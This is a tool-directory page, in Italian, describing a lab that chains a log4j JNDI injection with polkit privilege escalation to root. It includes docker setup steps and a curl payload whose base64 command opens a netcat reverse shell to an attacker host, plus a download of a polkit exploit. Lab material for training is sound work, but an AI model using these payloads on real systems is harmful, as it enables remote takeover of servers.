Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
log4j-polkit-poc — Ambiente vulnerabile per mostrare una catena di attacco di log4j CVE-2021-44228 con escalation dei privilegi a root tramite l'exploit polkit CVE-2021-4034 | Kitploit
Strumenti/GitHubGitHub/0xalwayslucky/log4j-polkit-poc
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneRed TeamingLab e Pratica
GitHub0xalwayslucky/log4j-polkit-poc

log4j-polkit-poc

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Ambiente vulnerabile per mostrare una catena di attacco di log4j CVE-2021-44228 con escalation dei privilegi a root tramite l'exploit polkit CVE-2021-4034

Vedi Repository
124 anni faNon ancora revisionato

log4j CVE-2021-44228 + polkit CVE-2021-4034

Istanza vulnerabile per l'exploit di log4j Apache e l'escalation dei privilegi tramite polkit

  • Il file spring-boot-application.jar vulnerabile è stato estratto da questa immagine docker
  • Il server JNDI malevolo è stato scaricato da qui e citato in questo articolo.

Video PoC

Video PoC

creazione delle istanze vulnerabili

log4j-polkit-vuln

L'istanza vulnerabile sarà in esecuzione e in ascolto sulla porta 80 (esposta alla macchina host) al termine dei passaggi seguenti. La parte vulnerabile per l'exploit di log4j è l'header X-Api-Version inviato al server.

Docker: log4j-polkit-vulnerable-server

passaggi per scaricare ed eseguire l'immagine docker vulnerabile:

root@kitploit:~
docker pull 0xalwayslucky/log4j-polkit-vulnerable-server
docker run -p 80:8080 0xalwayslucky/log4j-polkit-vulnerable-server

passaggi per creare manualmente un'istanza vulnerabile per log4j + polkit:

Nota: i Dockerfile richiedono che determinate versioni delle applicazioni vulnerabili siano presenti nei repository di ubuntu. Se queste vengono aggiornate e/o rimosse in qualsiasi momento, la creazione dell'immagine docker fallirà. Per risolvere questo problema, un'immagine verrà caricata su docker hub e collegata qui.

root@kitploit:~
git clone https://github.com/0xalwayslucky/log4j-polkit-poc
cd log4j-polkit-poc/log4j-polkit-vuln
docker build -t log4j-polkit-vulnerable-server .
docker run -p 80:8080 --hostname victim log4j-polkit-vulnerable-server

attackserver

Questo simulerà la macchina dell'attaccante, in questo caso presente nella stessa rete (per una facile comunicazione tra i container docker), ma l'exploit funziona indipendentemente da dove si trova questo server di attacco (unica condizione è che sia accessibile dalla vittima). Il server JNDI malevolo sarà ospitato qui e creerà una classe malevola per eseguire comandi arbitrari sulla macchina della vittima.

passaggi per creare una macchina attaccante simulata:

root@kitploit:~
git clone https://github.com/0xalwayslucky/log4j-polkit-poc
cd log4j-polkit-poc/attackserver
docker build -t attackserver .
docker run -it --hostname attackserver attackserver /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i <ip> -p 8888 &  # nel container docker

sfruttamento

comandi dal video PoC

Nota: l'indirizzo IP dell'attackserver potrebbe variare

root@kitploit:~
# Exploit Log4j
curl http://localhost -H 'X-Api-Version: ${jndi:ldap://172.17.0.3:1389/Basic/Command/Base64/bmMgMTcyLjE3LjAuMyA0NDQ0IC1lIC9iaW4vYmFzaA==}'

# Exploit Polkit
wget https://raw.githubusercontent.com/afwu/CVE-2021-4035/main/cve-2021-4034-poc.c

Scarica lo strumento